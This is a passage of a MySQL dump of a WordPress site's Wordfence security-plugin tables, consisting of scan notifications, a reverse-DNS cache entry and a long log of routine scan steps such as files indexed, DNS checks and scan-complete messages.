href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">18 issues found in most recent scan</a>','[]'),('site-CECAAAA',0,'wfplugin_scan',502,1569896720,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">19 issues found in most recent scan</a>','[]'),('site-C4CAAAA',0,'wfplugin_scan',502,1570156826,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">19 issues found in most recent scan</a>','[]'),('site-D4CAAAA',0,'wfplugin_scan',502,1570416178,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">19 issues found in most recent scan</a>','[]'),('site-EUCAAAA',0,'wfplugin_scan',502,1570674389,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">19 issues found in most recent scan</a>','[]'),('site-FUCAAAA',0,'wfplugin_scan',502,1570933569,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">19 issues found in most recent scan</a>','[]'),('site-GMCAAAA',0,'wfplugin_scan',502,1571192746,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">20 issues found in most recent scan</a>','[]'),('site-HICAAAA',0,'wfplugin_scan',502,1571452139,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">20 issues found in most recent scan</a>','[]'),('site-IACAAAA',0,'wfplugin_scan',502,1571711223,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">20 issues found in most recent scan</a>','[]'),('site-IYCAAAA',1,'wfplugin_scan',502,1571971176,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">20 issues found in most recent scan</a>','[]');
/*!40000 ALTER TABLE `wpdp_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfpendingissues`
--

DROP TABLE IF EXISTS `wpdp_wfpendingissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text,
  `data` text,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfpendingissues`
--

LOCK TABLES `wpdp_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wpdp_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfreversecache`
--

DROP TABLE IF EXISTS `wpdp_wfreversecache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfreversecache`
--

LOCK TABLES `wpdp_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wpdp_wfreversecache` DISABLE KEYS */;
INSERT INTO `wpdp_wfreversecache` (`IP`, `host`, `lastUpdate`) VALUES ('\0\0\0\0\0\0\0\0\0\0ÿÿBùGj','crawl-66-249-71-106.googlebot.com',1571957154);
/*!40000 ALTER TABLE `wpdp_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfsnipcache`
--

DROP TABLE IF EXISTS `wpdp_wfsnipcache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfsnipcache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT '0',
  `type` int(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=MyISAM AUTO_INCREMENT=21437 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfsnipcache`
--

LOCK TABLES `wpdp_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wpdp_wfsnipcache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfstatus`
--

DROP TABLE IF EXISTS `wpdp_wfstatus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=MyISAM AUTO_INCREMENT=23786 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfstatus`
--

LOCK TABLES `wpdp_wfstatus` WRITE;
/*!40000 ALTER TABLE `wpdp_wfstatus` DISABLE KEYS */;
INSERT INTO `wpdp_wfstatus` (`id`, `ctime`, `level`, `type`, `msg`) VALUES (23313,1570464902.440406,2,'info','22764 files indexed'),(23312,1570464900.517499,2,'info','22264 files indexed'),(23311,1570464899.821468,2,'info','21764 files indexed'),(23310,1570464894.023432,2,'info','21264 files indexed'),(23309,1570464893.334631,2,'info','21021 files indexed'),(23308,1570464891.955627,2,'info','20521 files indexed'),(23307,1570464890.760561,2,'info','20021 files indexed'),(23305,1570464889.076616,2,'info','19021 files indexed'),(23306,1570464889.667136,2,'info','19521 files indexed'),(23304,1570464888.283409,2,'info','18521 files indexed'),(23302,1570464886.442922,2,'info','17521 files indexed'),(23303,1570464887.497875,2,'info','18021 files indexed'),(23301,1570464885.696315,2,'info','17021 files indexed'),(23299,1570464884.271577,2,'info','16021 files indexed'),(23300,1570464884.981082,2,'info','16521 files indexed'),(23298,1570464883.705016,2,'info','15521 files indexed'),(23296,1570464882.760335,2,'info','14521 files indexed'),(23297,1570464883.352641,2,'info','15021 files indexed'),(23295,1570464882.166512,2,'info','14021 files indexed'),(23293,1570464880.877730,2,'info','13021 files indexed'),(23294,1570464881.357772,2,'info','13521 files indexed'),(23286,1570464872.269835,2,'info','9593 files indexed'),(23287,1570464872.706014,2,'info','10093 files indexed'),(23288,1570464873.064237,2,'info','10593 files indexed'),(23289,1570464874.015810,2,'info','11021 files indexed'),(23290,1570464879.320377,2,'info','11521 files indexed'),(23291,1570464879.761474,2,'info','12021 files indexed'),(23292,1570464880.090443,2,'info','12521 files indexed'),(23723,1571760790.909270,2,'info','4681 files indexed'),(23713,1571760762.461912,2,'info','500 files indexed'),(23714,1571760763.504519,2,'info','1000 files indexed'),(23715,1571760763.574378,2,'info','1500 files indexed'),(23716,1571760763.649974,2,'info','2000 files indexed'),(23717,1571760763.725858,2,'info','2500 files indexed'),(23718,1571760763.809254,2,'info','3000 files indexed'),(23719,1571760763.877831,2,'info','3500 files indexed'),(23720,1571760763.966150,2,'info','4000 files indexed'),(23721,1571760764.034716,2,'info','4500 files indexed'),(23722,1571760768.072592,2,'info','4675 files indexed'),(23724,1571760824.666680,2,'info','5181 files indexed'),(23725,1571760824.910075,2,'info','5681 files indexed'),(23726,1571760825.224844,2,'info','6181 files indexed'),(23727,1571760825.675031,2,'info','6681 files indexed'),(23728,1571760826.793310,2,'info','7181 files indexed'),(23729,1571760826.907675,2,'info','7681 files indexed'),(23730,1571760827.042969,2,'info','8181 files indexed'),(23731,1571760828.598635,2,'info','8681 files indexed'),(23732,1571760830.237978,2,'info','9181 files indexed'),(23733,1571760832.667806,2,'info','9681 files indexed'),(23734,1571760833.003850,2,'info','9751 files indexed'),(23735,1571760838.708329,2,'info','10251 files indexed'),(23736,1571760839.087073,2,'info','10751 files indexed'),(23737,1571760840.694209,2,'info','11251 files indexed'),(23738,1571760841.350485,2,'info','11751 files indexed'),(23739,1571760841.886644,2,'info','12251 files indexed'),(23740,1571760842.555966,2,'info','12751 files indexed'),(23741,1571760843.881864,2,'info','13251 files indexed'),(23742,1571760845.074769,2,'info','13751 files indexed'),(23743,1571760846.589943,2,'info','14251 files indexed'),(23744,1571760848.083755,2,'info','14751 files indexed'),(23632,1571502911.679856,2,'info','Getting theme list from WordPress'),(23633,1571502911.686848,2,'info','Found 1 themes'),(23634,1571502911.715492,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(23635,1571502914.310143,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(23636,1571502914.314545,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(23637,1571502914.318564,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(23638,1571502914.322016,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(23639,1571502914.323602,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(23640,1571502914.326716,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(23641,1571502914.330076,10,'info','SUM_DISABLED:Skipping theme scan'),(22866,1569428120.028026,2,'info','8472 files indexed'),(22863,1569428116.998904,2,'info','6972 files indexed'),(22864,1569428117.160349,2,'info','7472 files indexed'),(22865,1569428117.411488,2,'info','7972 files indexed'),(23147,1570205788.192006,2,'info','6567 files indexed'),(23146,1570205787.107627,2,'info','6067 files indexed'),(23141,1570205673.748030,2,'info','4405 files indexed'),(23142,1570205683.258952,2,'info','4561 files indexed'),(23143,1570205709.161718,2,'info','4567 files indexed'),(23144,1570205785.609698,2,'info','5067 files indexed'),(23145,1570205786.070475,2,'info','5567 files indexed'),(23615,1571502910.378013,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(23616,1571502910.391209,10,'info','SUM_START:Scanning DNS for unauthorized changes'),(23617,1571502910.395331,2,'info','Starting DNS scan for bintara.com.my'),(23618,1571502911.099234,2,'info','Scanning DNS A record for bintara.com.my'),(23619,1571502911.349128,2,'info','Scanning DNS MX record for bintara.com.my'),(23620,1571502911.349860,2,'info','Scanning DNS MX record for bintara.com.my'),(22786,1569169492.004136,2,'info','22449 files indexed'),(23244,1570464819.750309,2,'info','Total disk space: 498.06 GB -- Free disk space: 138.67 GB'),(23245,1570464819.750894,2,'info','The disk has 141993.51 MB available'),(22451,1568687468.066327,1,'info','Initiating quick scan'),(22790,1569169509.513752,2,'info','24449 files indexed'),(22791,1569169512.026997,2,'info','24648 files indexed'),(22787,1569169498.327923,2,'info','22949 files indexed'),(22788,1569169499.644836,2,'info','23449 files indexed'),(22789,1569169500.419627,2,'info','23949 files indexed'),(23712,1571760762.401418,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(23708,1571760762.376748,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(23711,1571760762.383910,10,'info','SUM_START:Scanning for known malware files'),(23710,1571760762.380955,10,'info','SUM_DISABLED:Skipping plugin scan'),(23709,1571760762.380191,10,'info','SUM_DISABLED:Skipping theme scan'),(23416,1570847496.918451,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 46.75 MB'),(23082,1570069899.164038,1,'info','-------------------'),(22798,1569291925.222432,1,'info','-------------------'),(22799,1569291925.223564,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 43.25 MB'),(22800,1569291925.239990,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23417,1570847497.018364,1,'info','Quick Scan Complete. Scanned in 1 second.'),(22803,1569378313.065883,1,'info','Initiating quick scan'),(23662,1571625800.389210,1,'info','-------------------'),(23661,1571625800.381393,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23077,1570069898.326766,1,'info','Initiating quick scan'),(23420,1570933569.697933,1,'info','Initiating quick scan'),(22808,1569378313.500313,1,'info','-------------------'),(22809,1569378313.501840,2,'info','Wordfence used 512 KB of memory for scan. Server peak memory usage was: 43 MB'),(22810,1569378313.502353,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23614,1571502905.623421,10,'info','SUM_START:Checking for the most secure way to get IPs'),(22812,1569427988.674187,1,'info','Scheduled Wordfence scan starting at Thursday 26th of September 2019 12:13:08 AM'),(22814,1569427993.901061,1,'info','Contacting Wordfence to initiate scan'),(23205,1570205994.434814,2,'info','33019 files indexed'),(23207,1570205999.794164,2,'info','34019 files indexed'),(23206,1570205996.020919,2,'info','33519 files indexed'),(23644,1571502914.339211,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(23643,1571502914.333773,10,'info','SUM_START:Scanning for known malware files'),(23642,1571502914.331091,10,'info','SUM_DISABLED:Skipping plugin scan'),(23472,1570985395.966650,2,'info','3140 files indexed'),(22989,1569896719.801139,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23320,1570588509.916372,1,'info','Initiating quick scan'),(23598,1571452138.907754,10,'info','SUM_PREP:Preparing a new scan.'),(23599,1571452139.138502,1,'info','Initiating quick scan'),(22987,1569896719.786674,1,'info','-------------------'),(22988,1569896719.800183,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 47 MB'),(22674,1568946389.136777,1,'info','Initiating quick scan'),(22476,1568860230.439123,1,'info','-------------------'),(22944,1569688769.147513,2,'info','8498 files indexed'),(22942,1569688766.566682,2,'info','7536 files indexed'),(22943,1569688766.864912,2,'info','8036 files indexed'),(23609,1571502898.521922,10,'info','SUM_PREP:Preparing a new scan.'),(23610,1571502898.526604,1,'info','Contacting Wordfence to initiate scan'),(23251,1570464820.095292,2,'info','Getting plugin list from WordPress'),(23252,1570464820.173021,2,'info','Found 34 plugins'),(23253,1570464820.173725,2,'info','Getting theme list from WordPress'),(23254,1570464820.183506,2,'info','Found 1 themes'),(23613,1571502903.609949,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blacklist is for paid members only'),(23612,1571502901.604196,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(23611,1571502899.591085,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(23495,1571192746.640741,10,'info','SUM_FINAL:Scan complete. You have 20 new issues to fix. See below.'),(23494,1571192746.628821,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23493,1571192746.628498,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 46.75 MB'),(23766,1571883999.027889,10,'info','SUM_PREP:Preparing a new scan.'),(23492,1571192746.626551,1,'info','-------------------'),(23767,1571883999.090896,1,'info','Initiating quick scan'),(23768,1571883999.093497,10,'info','SUM_START:Checking Web Application Firewall status'),(23769,1571883999.094175,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23133,1570205651.729516,2,'info','500 files indexed'),(23134,1570205655.032715,2,'info','905 files indexed'),(23098,1570205638.636610,1,'info','Contacting Wordfence to initiate scan'),(22725,1569169395.083624,2,'info','Getting plugin list from WordPress'),(22542,1568909642.130466,2,'info','11390 files indexed'),(22543,1568909644.135062,2,'info','11691 files indexed'),(22540,1568909639.258739,2,'info','10390 files indexed'),(22541,1568909640.619726,2,'info','10890 files indexed'),(22539,1568909638.612517,2,'info','9890 files indexed'),(22537,1568909637.265412,2,'info','8890 files indexed'),(22538,1568909638.075865,2,'info','9390 files indexed'),(22535,1568909634.780181,2,'info','7890 files indexed'),(22536,1568909635.346165,2,'info','8390 files indexed'),(22534,1568909634.073514,2,'info','7390 files indexed'),(22533,1568909630.750285,2,'info','6890 files indexed'),(22532,1568909624.129083,2,'info','6390 files indexed'),(22530,1568909620.083480,2,'info','5799 files indexed'),(22531,1568909623.454701,2,'info','6299 files indexed'),(23140,1570205672.570720,2,'info','3905 files indexed'),(23139,1570205671.691538,2,'info','3405 files indexed'),(23138,1570205670.751996,2,'info','2905 files indexed'),(23137,1570205669.922134,2,'info','2405 files indexed'),(23135,1570205668.296276,2,'info','1405 files indexed'),(23136,1570205669.006143,2,'info','1905 files indexed'),(23075,1569946559.093101,2,'info','21946 files indexed'),(23074,1569946556.840289,2,'info','21692 files indexed'),(22745,1569169398.557437,2,'info','3000 files indexed'),(22750,1569169460.619378,2,'info','4972 files indexed'),(22749,1569169431.102826,2,'info','4472 files indexed'),(22747,1569169398.683575,2,'info','4000 files indexed'),(22748,1569169399.017438,2,'info','4455 files indexed'),(22746,1569169398.614472,2,'info','3500 files indexed'),(22744,1569169398.487269,2,'info','2500 files indexed'),(22742,1569169398.362475,2,'info','1500 files indexed'),(22743,1569169398.425112,2,'info','2000 files indexed'),(22741,1569169398.143715,2,'info','1000 files indexed'),(23475,1570985411.864227,2,'info','4617 files indexed'),(23474,1570985396.962595,2,'info','4140 files indexed'),(23473,1570985396.345691,2,'info','3640 files indexed'),(23536,1571242306.278418,2,'info','1663 files indexed'),(23537,1571242306.569519,2,'info','2163 files indexed'),(23538,1571242306.915475,2,'info','2663 files indexed'),(23539,1571242308.129723,2,'info','3163 files indexed'),(23540,1571242308.382888,2,'info','3663 files indexed'),(23541,1571242308.613460,2,'info','4163 files indexed'),(23542,1571242311.677363,2,'info','4663 files indexed'),(23543,1571242318.163366,2,'info','4668 files indexed'),(23544,1571242377.757894,2,'info','4674 files indexed'),(23545,1571242416.287137,2,'info','5174 files indexed'),(23546,1571242416.503608,2,'info','5674 files indexed'),(23547,1571242417.039720,2,'info','6174 files indexed'),(23548,1571242417.910290,2,'info','6674 files indexed'),(23549,1571242418.851027,2,'info','7174 files indexed'),(23550,1571242418.998004,2,'info','7674 files indexed'),(23551,1571242419.376820,2,'info','8174 files indexed'),(23552,1571242422.312349,2,'info','8674 files indexed'),(23553,1571242423.009592,2,'info','8896 files indexed'),(23554,1571242431.108753,2,'info','9396 files indexed'),(23555,1571242433.451624,2,'info','9896 files indexed'),(23556,1571242434.161471,2,'info','10396 files indexed'),(23557,1571242435.748224,2,'info','10896 files indexed'),(23558,1571242436.601895,2,'info','11396 files indexed'),(23559,1571242437.331010,2,'info','11896 files indexed'),(23560,1571242437.901051,2,'info','12396 files indexed'),(23561,1571242438.728362,2,'info','12896 files indexed'),(23562,1571242440.247069,2,'info','13396 files indexed'),(23563,1571242441.633760,2,'info','13896 files indexed'),(23564,1571242443.978004,2,'info','14396 files indexed'),(23565,1571242444.002982,2,'info','14405 files indexed'),(23566,1571242452.827399,2,'info','14905 files indexed'),(23567,1571242453.704445,2,'info','15405 files indexed'),(23568,1571242454.612728,2,'info','15905 files indexed'),(23569,1571242456.118627,2,'info','16405 files indexed'),(23570,1571242457.182174,2,'info','16905 files indexed'),(23571,1571242458.296434,2,'info','17405 files indexed'),(23572,1571242459.301770,2,'info','17905 files indexed'),(23573,1571242462.113936,2,'info','18405 files indexed'),(23574,1571242463.495330,2,'info','18905 files indexed'),(23575,1571242464.107417,2,'info','19405 files indexed'),(23576,1571242465.274983,2,'info','19905 files indexed'),(23577,1571242467.014197,2,'info','20385 files indexed'),(23578,1571242473.903841,2,'info','20885 files indexed'),(23579,1571242476.148347,2,'info','21385 files indexed'),(23580,1571242478.301764,2,'info','21885 files indexed'),(23581,1571242480.144514,2,'info','22385 files indexed'),(23582,1571242482.004208,2,'info','22885 files indexed'),(23583,1571242484.240237,2,'info','23385 files indexed'),(23584,1571242486.119538,2,'info','23885 files indexed'),(23585,1571242487.029937,2,'info','24126 files indexed'),(23586,1571242500.830499,2,'info','24626 files indexed'),(23587,1571242507.009314,2,'info','24850 files indexed'),(22751,1569169460.756479,2,'info','5472 files indexed'),(22767,1569169470.429737,2,'info','13472 files indexed'),(22768,1569169471.009828,2,'info','13876 files indexed'),(22766,1569169469.613062,2,'info','12972 files indexed'),(22764,1569169468.119512,2,'info','11972 files indexed'),(22765,1569169468.536929,2,'info','12472 files indexed'),(22763,1569169467.710274,2,'info','11472 files indexed'),(22761,1569169465.891066,2,'info','10472 files indexed'),(22762,1569169467.257035,2,'info','10972 files indexed'),(22760,1569169465.409434,2,'info','9972 files indexed'),(22758,1569169464.276555,2,'info','8972 files indexed'),(22759,1569169465.017446,2,'info','9472 files indexed'),(22752,1569169461.204512,2,'info','5972 files indexed'),(22753,1569169461.712443,2,'info','6472 files indexed'),(22754,1569169462.156488,2,'info','6972 files indexed'),(22755,1569169462.274898,2,'info','7472 files indexed'),(22756,1569169462.501595,2,'info','7972 files indexed'),(22757,1569169463.500903,2,'info','8472 files indexed'),(22642,1568909971.920329,2,'info','Done host key check.'),(22643,1568909971.927320,2,'info','Checking 4 URLs from 3 sources.'),(22644,1568909972.657494,2,'info','Done URL check.'),(22645,1568909972.664054,2,'info','Done file contents scan'),(23016,1569946309.143271,2,'info','Found 1 themes'),(23014,1569946309.132952,2,'info','Found 34 plugins'),(23015,1569946309.133495,2,'info','Getting theme list from WordPress'),(23013,1569946309.079108,2,'info','Getting plugin list from WordPress'),(22651,1568909972.997296,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(22652,1568909972.998403,2,'info','Checking 128 host keys against Wordfence scanning servers.'),(22653,1568909973.767258,2,'info','Done host key check.'),(22654,1568909973.768271,2,'info','Done examining URLs'),(23785,1571971176.252456,10,'info','SUM_FINAL:Scan complete. You have 20 new issues to fix. See below.'),(23784,1571971176.251572,1,'info','Quick Scan Complete. Scanned in 1 second.'),(23007,1569946308.287158,2,'info','The disk has 144222.88 MB available'),(22659,1568909973.796548,2,'info','Starting password strength check on 2 users.'),(23006,1569946308.286542,2,'info','Total disk space: 498.06 GB -- Free disk space: 140.84 GB'),(23783,1571971176.251066,2,'info','Wordfence used 512 KB of memory for scan. Server peak memory usage was: 46 MB'),(23782,1571971176.249485,1,'info','-------------------'),(23003,1569946308.272737,2,'info','Scanning DNS MX record for bintara.com.my'),(23002,1569946308.271978,2,'info','Scanning DNS MX record for bintara.com.my'),(22666,1568909985.179268,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(22667,1568909985.179944,2,'info','Done examining URLs'),(23001,1569946308.238306,2,'info','Scanning DNS A record for bintara.com.my'),(22669,1568909985.186208,1,'info','-------------------'),(22953,1569688789.170447,2,'info','12998 files indexed'),(22954,1569688790.010217,2,'info','13369 files indexed'),(22955,1569688796.585227,2,'info','13869 files indexed'),(22956,1569688798.149559,2,'info','14369 files indexed'),(22957,1569688799.695432,2,'info','14869 files indexed'),(22958,1569688800.400869,2,'info','15369 files indexed'),(22959,1569688802.561953,2,'info','15869 files indexed'),(22960,1569688806.517132,2,'info','16369 files indexed'),(22961,1569688808.309820,2,'info','16869 files indexed'),(22962,1569688809.628109,2,'info','17369 files indexed'),(22963,1569688810.772128,2,'info','17869 files indexed'),(22964,1569688811.101052,2,'info','17955 files indexed'),(22965,1569688823.019606,2,'info','18455 files indexed'),(22966,1569688824.189772,2,'info','18955 files indexed'),(22967,1569688825.312314,2,'info','19455 files indexed'),(22968,1569688827.159294,2,'info','19955 files indexed'),(22969,1569688829.091740,2,'info','20455 files indexed'),(22970,1569688831.316356,2,'info','20955 files indexed'),(22504,1568909519.883392,2,'info','Getting theme list from WordPress'),(22505,1568909519.889602,2,'info','Found 1 themes'),(23681,1571760756.883088,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blacklist is for paid members only'),(23680,1571760754.880133,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(23361,1570723988.531864,2,'info','Getting plugin list from WordPress'),(23362,1570723988.586433,2,'info','Found 34 plugins'),(23363,1570723988.587016,2,'info','Getting theme list from WordPress'),(23364,1570723988.595875,2,'info','Found 1 themes'),(23678,1571760751.417023,1,'info','Contacting Wordfence to initiate scan'),(23679,1571760752.876268,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(23677,1571760751.412265,10,'info','SUM_PREP:Preparing a new scan.'),(23676,1571760746.300156,1,'info','Scheduled Wordfence scan starting at Wednesday 23rd of October 2019 12:12:26 AM'),(23675,1571711223.323544,10,'info','SUM_FINAL:Scan complete. You have 20 new issues to fix. See below.'),(22641,1568909970.661343,2,'info','Checking 6994 host keys against Wordfence scanning servers.'),(22640,1568909970.623992,2,'info','Asking Wordfence to check URLs against malware list.'),(22639,1568909970.623296,2,'info','Scanned contents of 199 additional files at 7.60 per second'),(22638,1568909970.313300,2,'info','Scanned contents of 195 additional files at 7.54 per second'),(22637,1568909969.252338,2,'info','Scanned contents of 183 additional files at 7.37 per second'),(23275,1570464829.004487,2,'info','4559 files indexed'),(23274,1570464828.949083,2,'info','4500 files indexed'),(23272,1570464828.192106,2,'info','3500 files indexed'),(23273,1570464828.513138,2,'info','4000 files indexed'),(23271,1570464827.474655,2,'info','3000 files indexed'),(23269,1570464826.287205,2,'info','2000 files indexed'),(23270,1570464826.707495,2,'info','2500 files indexed'),(23268,1570464825.739530,2,'info','1500 files indexed'),(23266,1570464822.998867,2,'info','500 files indexed'),(23267,1570464825.534278,2,'info','1000 files indexed'),(23600,1571452139.152277,10,'info','SUM_START:Checking Web Application Firewall status'),(23601,1571452139.318069,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23602,1571452139.322866,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(22528,1568909619.775707,2,'info','4799 files indexed'),(22529,1568909619.899980,2,'info','5299 files indexed'),(22526,1568909617.402745,2,'info','3799 files indexed'),(22527,1568909618.430453,2,'info','4299 files indexed'),(22525,1568909616.484158,2,'info','3299 files indexed'),(22523,1568909584.400741,2,'info','2299 files indexed'),(22524,1568909616.057069,2,'info','2799 files indexed'),(22521,1568909529.035584,2,'info','2282 files indexed'),(22522,1568909550.582203,2,'info','2293 files indexed'),(22520,1568909526.399017,2,'info','2000 files indexed'),(22519,1568909524.678327,2,'info','1500 files indexed'),(23707,1571760762.372372,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(23706,1571760762.370410,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(23704,1571760762.362362,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(23705,1571760762.366250,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(22952,1569688788.002457,2,'info','12498 files indexed'),(23663,1571625800.391430,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 47.25 MB'),(23415,1570847496.917418,1,'info','-------------------'),(22793,1569291925.031888,1,'info','Initiating quick scan'),(22461,1568773853.553584,1,'info','Initiating quick scan'),(23084,1570069899.197121,1,'info','Quick Scan Complete. Scanned in 1 second.'),(22518,1568909523.377447,2,'info','1000 files indexed'),(23603,1571452139.568841,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23604,1571452139.572632,1,'info','-------------------'),(23605,1571452139.573662,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 47 MB'),(23606,1571452139.573991,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23607,1571452139.574277,10,'info','SUM_FINAL:Scan complete. You have 20 new issues to fix. See below.'),(23608,1571502893.265571,1,'info','Scheduled Wordfence scan starting at Sunday 20th of October 2019 12:34:53 AM'),(22740,1569169398.059223,2,'info','500 files indexed'),(22726,1569169395.122504,2,'info','Found 33 plugins'),(22727,1569169395.134332,2,'info','Getting theme list from WordPress'),(22728,1569169395.140748,2,'info','Found 1 themes'),(23531,1571242291.315474,10,'info','SUM_START:Scanning for known malware files'),(23096,1570205621.738249,1,'info','Scheduled Wordfence scan starting at Saturday 5th of October 2019 12:13:41 AM'),(23532,1571242291.320558,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(23094,1570156826.652804,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23093,1570156826.652277,2,'info','Wordfence used 1 MB of memory for scan. Server peak memory usage was: 47 MB'),(23667,1571711223.082776,1,'info','Initiating quick scan'),(23092,1570156826.650176,1,'info','-------------------'),(23664,1571625800.392192,1,'info','Quick Scan Complete. Scanned in 1 second.'),(23410,1570847496.471471,1,'info','Initiating quick scan'),(23666,1571711222.955158,10,'info','SUM_PREP:Preparing a new scan.'),(23665,1571625800.392731,10,'info','SUM_FINAL:Scan complete. You have 20 new issues to fix. See below.'),(23087,1570156826.447363,1,'info','Initiating quick scan'),(23591,1571365635.457131,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23589,1571365635.436344,1,'info','Initiating quick scan'),(23590,1571365635.455796,10,'info','SUM_START:Checking Web Application Firewall status'),(22911,1569688670.016403,2,'info','Getting plugin list from WordPress'),(22912,1569688670.577552,2,'info','Found 34 plugins'),(22913,1569688670.578171,2,'info','Getting theme list from WordPress'),(22914,1569688670.589194,2,'info','Found 1 themes'),(23690,1571760759.652463,10,'info','SUM_START:Scanning to check available disk space'),(23691,1571760759.660644,2,'info','Total disk space: 498.06 GB -- Free disk space: 131.81 GB'),(23341,1570723975.620992,1,'info','Contacting 